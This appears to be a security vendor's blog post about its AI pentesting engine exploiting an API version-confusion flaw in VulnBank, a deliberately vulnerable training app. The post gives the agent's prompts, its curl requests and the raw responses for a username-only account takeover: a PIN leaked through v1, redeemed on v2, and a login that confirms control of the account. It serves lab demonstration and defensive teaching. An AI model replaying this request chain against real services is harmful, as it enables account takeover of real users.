Mon 15 December 2025
During a live demo of our AI pentesting engine, someone threw in one of those "yeah but can it do this?" questions:
"Could it actually find an API version confusion bug that leads to account takeover?"
We didn't have a canned story ready, so we pointed the engine at the target with the vulnerability, in this case VulnBank, a deliberately vulnerable banking app by Al-Amir Badmus, and let it go. What came back was exactly the kind of thing you hope exists only in training labs and not in production apps: a password-reset version confusion flaw that lets you take over accounts with nothing but a username.
Let's walk through what happened.
The Setup: v1 is bad, v2 is good… right?
VulnBank exposes password reset flows on two API versions:
POST /api/v1/forgot-passwordPOST /api/v2/forgot-passwordPOST /api/v1/reset-passwordPOST /api/v2/reset-password
The OpenAPI spec even tells you what's going on:
- v1: "full data exposure",
debug_infoincludes the 3‑digit reset PIN. - v2: "reduced data exposure", PIN is not exposed,
debug_infonot present.
So on paper:
- v1 = "legacy, leaky, don't use this in production".
- v2 = "fixed, shiny, and much safer".
Except both versions share the same backend state: the same PIN store, same users, same everything. And that's where the fun begins.
How the AI Approached It (and why that matters)
Most scanners would see "3‑digit PIN" and yell about weak entropy for 2 seconds, then move on to the next 500 endpoints.
The AI engine did something more… human:
1. Parsed the OpenAPI spec
It fetched openapi.json, looked for anything about password reset, and found /api/v{version}/forgot-password and /api/v{version}/reset-password.
2. Noticed versioned behavior differences
The spec literally documents:
- v1:
debug_infoincludes PIN. - v2: PIN not exposed,
debug_infogone.
That's a big red flag: same feature, different security characteristics, same backend.
3. Formed a hypothesis
"If both versions share backend state and one of them leaks the PIN, can I initiate on v1 and redeem on v2?"
4. Systematically tested that hypothesis
No fuzzing storm, no "let's just hammer it until something breaks". A small number of carefully chosen requests, each with a clear goal.
The key difference lies in understanding architecture rather than just endpoints, this is precisely where traditional fuzzing and a reasoning-driven engine part ways.
How the Engine Actually Did It: The Proof
Let's look at the actual AI tool execution, the real commands and responses that proved this vulnerability.
Risk Intelligence Output
The engine's risk intelligence step flagged the following risk:
Password reset version-confusion across POST
/api/v1/reset-passwordand POST/api/v2/reset-password: Exercise both versions to see if weaker validation/UX in v1 can be abused to trick users into insecure resets while v2 is stronger. Compare rate limits, token lifetimes/formats, error messaging, and whether mixed-version flows (initiate on v1, redeem on v2 or vice versa) are possible. Ensure old endpoints are retired or enforce parity and clear user messaging.
Below is how the engine systematically validated this risk.
System Prompt: Initial Reconnaissance
Fetch and parse the OpenAPI spec to enumerate password reset endpoints.
Action: Send exactly one GET request to https://vulnbank.org/static/openapi.json with a browser-like User-Agent over HTTP/1.1 keep-alive. Do not follow redirects or make any additional requests in this task. Keep rate <5 rps.
Evidence to capture: Save full raw HTTP request and response (status, headers, and body) for this single fetch.
Parsing goals (from the JSON only, no further network calls): Enumerate all paths related to password reset, including initiation and redemption/confirm. Specifically look for: /api/v1/reset-password and /api/v2/reset-password (methods, request body schema, required fields like email/captcha/MFA tokens); any confirm/redeem endpoints (e.g., /api/v1/reset-password/confirm, /api/v2/reset-password/confirm); any alternate or analogous paths. For each discovered endpoint, record: HTTP method(s), request body schema (field names, types, required flags) and example payloads if present, response codes and example/error messages, documented security requirements, and any version-specific differences between v1 and v2.
Using tool: curl
Args:
curl_args: -sS -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" --http1.1 -D - -o - -v https://vulnbank.org/static/openapi.json
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:21:20 GMT
Content-Type: application/json
Content-Length: 44061
Connection: keep-alive
Content-Disposition: inline; filename=openapi.json
Last-Modified: Mon, 13 Oct 2025 18:26:24 GMT
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=xGVbpMhRS34xZfjqdwOxLDgRUnOpqgDl7wUbKBP2gRog2Kaj0VPc9IvnPUqyGqCWx5jYshRIuONIdltkxgmILrGXGq0DukPtK3WMDg%3D%3D"}]}
CF-RAY: 99acca323ca1d3b1-FRA
alt-svc: h3=":443"; ma=86400
{
"openapi": "3.0.0",
"info": {
"title": "Vulnerable Bank API",
"description": "API documentation for the deliberately vulnerable banking application",
"version": "1.0.0",
"contact": {
"name": "Vulnerable Bank Support",
"url": "https://github.com/Commando-X/vuln-bank"
}
},
"servers": [
{
"url": "https://vulnbank.org",
"description": "Controlled Production Server"
}
],
"tags": [
{
"name": "authentication",
"description": "Authentication related endpoints"
},
{
"name": "transactions",
"description": "Transaction management endpoints"
},
{
"name": "users",
"description": "User management endpoints"
},
{
"name": "admin",
"description": "Administrative endpoints"
},
{
"name": "virtual-cards",
"description": "Virtual card management endpoints"
},
{
"name": "bill-payments",
"description": "Bill payment operations"
},
{
"name": "ai-agent",
"description": "AI Customer Support Agent (Intentionally Vulnerable)"
},
{
"name": "internal",
"description": "Internal-only endpoints for SSRF demonstration"
}
],
...
}
Parsing Results from OpenAPI JSON:
Servers/base URLs: https://vulnbank.org (description: Controlled Production Server). All enumerated endpoints are within the in-scope root host.
Password reset related endpoints (versioned with path parameter {version} ∈ {1,2}):
Initiation: /api/v{version}/forgot-password (POST)
Summary: Request password reset (versioned)
Description: Generate 3-digit reset PIN. Spec notes version differences in data exposure (v1 more sensitive, v2 less; v2 does not expose PIN in response).
Path parameters: version (in: path, required, integer, enum [1,2], default 2)
Request body (application/json, required): schema: object; properties: username: string; No explicit required[] array for the fields inside the object (only overall requestBody.required = true)
Responses: 200: Reset PIN generated; schema: object with properties: status (string), message (string), debug_info (object); Note: debug_info description: "v1: Contains extensive sensitive information including PIN. v2: Less sensitive information, PIN not exposed." 404: User not found (indicates potential user enumeration via status code/messages)
Security: No security scheme specified (public endpoint by spec)
Redemption/confirm: /api/v{version}/reset-password (POST)
Summary: Reset password using PIN (versioned)
Description: Reset password with 3-digit PIN. Version differences in data exposure (v1 includes sensitive debug info, including used PIN; v2 does not).
Path parameters: version (in: path, required, integer, enum [1,2], default 2)
Request body (application/json, required): schema: object; properties: username: string, reset_pin: string (pattern: ^\d{3}$), new_password: string; No explicit required[] array inside the object (only overall requestBody.required = true)
Responses: 200: Password reset successful; schema: object: status (string), message (string), debug_info (object); Note: debug_info description: "v1: Contains extensive debug information including used PIN. v2: Not present." 400: Invalid reset PIN
Security: No security scheme specified (public endpoint by spec)
Concrete versioned paths implied by the {version} placeholder: POST /api/v1/forgot-password, POST /api/v2/forgot-password, POST /api/v1/reset-password, POST /api/v2/reset-password
Documented version-specific differences (from spec text): v1 (older) exposes sensitive debug_info which may include the reset PIN and other details. v2 (newer) reduces data exposure; PIN is not exposed in responses and debug_info is not present on successful reset.
Critical Finding: The OpenAPI spec explicitly documents that v1 exposes debug_info.pin in responses while v2 does not, effectively announcing the security downgrade path.
Phase 1: Wait, did you just put the PIN in the response?
First, the engine tested what the spec suggested: does v1 actually leak the PIN?
System Prompt: Test v1 Information Disclosure
Initiate v1 password reset for Account A and capture full evidence.
Action: Send exactly one POST to https://vulnbank.org/api/v1/forgot-password with headers {Content-Type: application/json} and body {"username":"testA_vconf_01"}. Keep rate <5 rps and do not retry.
Evidence to record: Raw HTTP request and response (status, all headers incl. any rate-limit/CORS/debug headers), full JSON body.
Expected outcome: Determine if v1 leaks the 3-digit reset PIN via debug_info in the response (record the PIN verbatim if present).
Using tool: curl
Args:
curl -sS -v --http1.1 -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
-X POST "https://vulnbank.org/api/v1/forgot-password" \
-H "Content-Type: application/json" \
--data '{"username":"testA_vconf_01"}' \
-D - -o -
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:31:12 GMT
Content-Type: application/json
Content-Length: 228
Access-Control-Allow-Origin: *
{
"debug_info": {
"pin": "388",
"pin_length": 3,
"timestamp": "2025-11-07 12:22:57.378546",
"username": "testA_vconf_01"
},
"message": "Reset PIN has been sent to your email.",
"status": "success"
}
Critical Finding: The response directly exposes the reset PIN in debug_info.pin. With just a username, an attacker can retrieve the PIN without touching the victim's email.
The wildcard CORS policy compounds the issue: any website can trigger this request and read the response. Even without the leak, the 3-digit PIN space (000-999) is trivially bruteforceable. The response also confirms valid usernames, enabling enumeration attacks.
So:
- The 3‑digit reset PIN is right there in
debug_info.pin. - We only needed the username.
- The API is CORS‑wide open (
Access-Control-Allow-Origin: *), so any malicious site can trigger this request from the victim's browser, and read the PIN back in JavaScript.
No mailbox access, no phishing link, no user interaction beyond being logged in and visiting a malicious page. This alone is already a serious account takeover path.
Phase 2: Redeem v1 PIN for Account Takeover
System Prompt: Confirm Exploitability
Redeem v1 reset PIN for Account A to verify exploitability of the v1 PIN leakage.
Action: Send exactly one POST to https://vulnbank.org/api/v1/reset-password with body: {"username":"testA_vconf_01","reset_pin":"388","new_password":"Tmp!Pass#A1"}. Single attempt only.
Expected outcome: Confirm that the leaked v1 PIN can reset Account A's password, demonstrating practical ATO.
Using tool: curl
Args:
curl -sS -i --http1.1 -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
-X POST "https://vulnbank.org/api/v1/reset-password" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive" \
--data '{"username":"testA_vconf_01","reset_pin":"388","new_password":"Tmp!Pass#A1"}'
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:33:27 GMT
Content-Type: application/json
Content-Length: 243
Connection: keep-alive
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Q%2BcQ5yGSX6r8390cSNwy9wykYa2YMUpMBvBph5sOKgLcMUjnVsMc2nVsujuibpoQ16DME9mFqO%2FIkNXrjGIWpEMPxMbhGeRNrdCFZg%3D%3D"}]}
CF-RAY: 99acdbf43a805d49-FRA
alt-svc: h3=":443"; ma=86400
{
"debug_info": {
"reset_pin_used": "388",
"reset_success": true,
"timestamp": "2025-11-07 12:25:12.976952",
"username": "testA_vconf_01"
},
"message": "Password has been reset successfully",
"status": "success"
}
The password reset succeeds. v1 accepts the leaked PIN and changes the password without any email verification. The response confirms the operation with reset_success: true and even echoes back the PIN in debug_info.reset_pin_used.
At this point, we've proven that v1 alone is exploitable. Username plus leaked PIN equals account takeover. But the interesting question is whether v2 suffers from the same flaw.
Phase 3: Test Cross-Version Acceptance (The Critical Discovery)
System Prompt: Test Version Confusion
Test whether v2's redemption endpoint accepts PINs issued by v1, which would indicate shared backend state without version-boundary enforcement.
Test Sequence: 1. Initiate password reset on v1 for testB_vconf_01 (obtain leaked PIN) 2. Attempt to redeem the v1-issued PIN via v2 redemption endpoint
Hypothesis: If successful, attackers can exploit v1's leakage while using v2's interface, bypassing any client-side hardening.
Step 1: Initiate v1 reset for Account B
Using tool: curl
Args:
curl -sS -v --http1.1 -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
-X POST "https://vulnbank.org/api/v1/forgot-password" \
-H "Content-Type: application/json" \
-H "Accept: application/json" \
-H "Connection: keep-alive" \
--data '{"username":"testB_vconf_01"}' \
-D - -o -
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:40:12 GMT
Content-Type: application/json
Content-Length: 228
Connection: keep-alive
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=G7Kqftl8cVngY46mK76PSPR8TjpqT%2Fdjc5KTJ%2BaaDXEBmeb%2BEBenfdKUF4LZAojIiaIYWKXhIDEFvlNoZZmSysyWGYbPIqAMpczTFg%3D%3D"}]}
CF-RAY: 99ace5d8da6ebb1b-CDG
alt-svc: h3=":443"; ma=86400
{
"debug_info": {
"pin": "223",
"pin_length": 3,
"timestamp": "2025-11-07 12:31:58.190715",
"username": "testB_vconf_01"
},
"message": "Reset PIN has been sent to your email.",
"status": "success"
}
Extracted v1 PIN: 223
Step 2: Redeem v1 PIN via v2 endpoint (cross-version attack)
Using tool: curl
Args:
curl -sS --http1.1 -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
-X POST "https://vulnbank.org/api/v2/reset-password" \
-H "Content-Type: application/json" \
-H "Accept: application/json" \
-H "Connection: keep-alive" \
--data '{"username":"testB_vconf_01","reset_pin":"223","new_password":"Tmp!Pass#B1"}' \
-D - -o -
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:41:22 GMT
Content-Type: application/json
Content-Length: 80
Connection: keep-alive
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=tPZNfCsblxfbMaoEi50%2FYgP3Dyl3NXIbm%2FbExP7sBEAqmaahb0wZhEUNXtqSGlS1dimQC06PrhN%2BgHA%2BKD2x966EbFFP1Y1DMarIuw%3D%3D"}]}
CF-RAY: 99ace78c3af0924d-FRA
alt-svc: h3=":443"; ma=86400
{
"message": "Password has been reset successfully",
"status": "success"
}
v2 accepts the PIN. Despite being designed to fix v1's data leakage, v2's reset endpoint still processes PINs issued by v1. The attack chain is now complete: request a reset via v1 to leak the PIN, redeem it via v2 to bypass any client-side protections.
This is the core issue with version confusion vulnerabilities. Both API versions share the same backend PIN storage, but they enforce different security controls. Attackers can trivially mix and match: use v1 where it's weak, use v2 where it's strong. The versioning creates an illusion of security boundaries that doesn't exist in the implementation.
Phase 4: Verification - Complete Account Takeover Proof
System Prompt: Verify Account Takeover
Verify that the mixed-version redemption for Account B took effect by logging in with the new password set via v2.
Action: Send exactly one POST to https://vulnbank.org/login with headers: Content-Type: application/json; a browser-like User-Agent; Connection: keep-alive. Body JSON: {"username":"testB_vconf_01","password":"Tmp!Pass#B1"}. Keep <5 rps; single attempt only.
Evidence to capture verbatim: Full raw HTTP request and full raw HTTP response (status, all headers including any Set-Cookie and Access-Control-Allow-*, and full JSON body).
Expected outcome: Confirmed login (200 success with valid token) demonstrates the v2 accept of a v1 PIN resulted in an actual password change. On success, extract the token, identify if JWT, and decode header/payload locally to confirm claims match Account B.
Using tool: curl
Args:
curl -sS --http1.1 -i -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive" \
-X POST "https://vulnbank.org/login" \
--data '{"username":"testB_vconf_01","password":"Tmp!Pass#B1"}'
Output:
HTTP/1.1 200 OK
Date: Fri, 07 Nov 2025 12:43:06 GMT
Content-Type: application/json
Content-Length: 501
Connection: keep-alive
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Access-Control-Allow-Origin: *
Server: cloudflare
cf-cache-status: DYNAMIC
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=VbrIMCsVFv4mkFtw%2FZPjNJMVtH8dELhrPGiY3jiVR6fT7G63HAaGXj%2B3P5z8zGS9gNRqqnzvka7L5cQ%2FSATUkkY87SWWVqM0KJntZA%3D%3D"}]}
Set-Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0NiwidXNlcm5hbWUiOiJ0ZXN0Ql92Y29uZl8wMSIsImlzX2FkbWluIjpmYWxzZSwiaWF0IjoxNzYyNTE4ODkyfQ.La_TBdG8Sv2tPiNK4XgmLZR1ek7wwvoztvs9slBMzw0; HttpOnly; Path=/
CF-RAY: 99acea17dacb6f99-CDG
alt-svc: h3=":443"; ma=86400
{
"accountNumber": "6235161082",
"debug_info": {
"account_number": "6235161082",
"is_admin": false,
"login_time": "2025-11-07 12:34:52.147690",
"user_id": 46,
"username": "testB_vconf_01"
},
"isAdmin": false,
"message": "Login successful",
"status": "success",
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0NiwidXNlcm5hbWUiOiJ0ZXN0Ql92Y29uZl8wMSIsImlzX2FkbWluIjpmYWxzZSwiaWF0IjoxNzYyNTE4ODkyfQ.La_TBdG8Sv2tPiNK4XgmLZR1ek7wwvoztvs9slBMzw0"
}
Token Analysis: Token format is JWT (three base64url segments). Decoded header: {"typ":"JWT","alg":"HS256"}. Decoded payload: {"user_id":46,"username":"testB_vconf_01","is_admin":false,"iat":1762518892}. Claims match: Account B (user_id 46, username testB_vconf_01).
The login succeeds. The password was successfully changed via the cross-version attack, and the JWT confirms we now control the account.
The complete attack requires only a username. No email access, no user interaction, no brute force. Request reset on v1, extract PIN from response, redeem on v2, authenticate. Four HTTP requests, under 30 minutes of testing.
Net cost of the attack:
- Inputs required: username only.
- User interaction: none.
- Requests:
- v1 forgot‑password → leak PIN
- v2 reset‑password → set password
- login → verify takeover
- Time: found in under 30 minutes of targeted probing.
Why This Happens: Trust Boundaries by Naming Convention
The root issue isn't just "you leaked a PIN" (though that's bad). It's the mental model teams have around API versioning:
- v1: "old stuff, might be a bit dodgy".
- v2: "fixed and safe".
But in reality:
- Both versions talk to the same PIN store.
- Both versions handle the same user accounts.
- Only one version got the security fix.
So you've created what looks like a security boundary—"use v2, it's safer"—without actually changing the trust boundary under the hood.
This is the broader pattern:
- Multiple versions of a security‑sensitive flow (password reset, MFA, tokens, sessions).
- One version gets hardened; the old one lingers, sometimes "for compatibility".
- Both share backend state.
- Attackers mix and match: use the weak pieces of v1, the convenient pieces of v2.
The OpenAPI spec here even advertises the downgrade path:
- "v1: debug_info includes PIN"
- "v2: no PIN exposure"
If you publish this and don't strictly separate behavior on the backend, you're essentially shipping your own attack playbook.
Why Fuzzing Alone Often Misses This
Traditional scanners tend to:
- Blast endpoints with payloads.
- Flag low‑hanging issues (weak entropy, missing auth, etc.).
- Treat each endpoint largely in isolation.
This bug wasn't about:
- A weird edge‑case parser issue,
- A bizarre HTTP smuggling gadget,
- Or something only reproducible with 6 proxies and a goat sacrifice.
It was about relationships:
- Same user.
- Same PIN.
- Two versions of the same flow with different guarantees.
The AI engine found it by:
- Reading the OpenAPI spec like a human would.
- Spotting that v1 and v2 behave differently around security.
- Asking, "Do they share state?" and then proving they do.
If your testing strategy doesn't reason about flows across versions, these bugs will sit there happily in plain sight.
The Meta‑Lesson: Targeted Reasoning Beats Blind Thrashing
This whole bug fell out of a simple thought process:
- The spec says there are 2 versions.
- The spec says they behave differently around security.
- Tokens seem shared.
- Try mixing them.
No giant wordlists. No hours of fuzzing. Just understanding and a handful of well‑chosen HTTP requests.
If you're building or testing APIs at any scale, you want that kind of thinking—human or machine—on your side.
Table of Contents
- The Setup: v1 is bad, v2 is good… right?
- How the AI Approached It (and why that matters)
- How the Engine Actually Did It: The Proof
- Phase 1: Wait, did you just put the PIN in the response?
- Phase 2: Redeem v1 PIN for Account Takeover
- Phase 3: Test Cross-Version Acceptance (The Critical Discovery)
- Phase 4: Verification - Complete Account Takeover Proof
- Why This Happens: Trust Boundaries by Naming Convention
- Why Fuzzing Alone Often Misses This
- The Meta‑Lesson: Targeted Reasoning Beats Blind Thrashing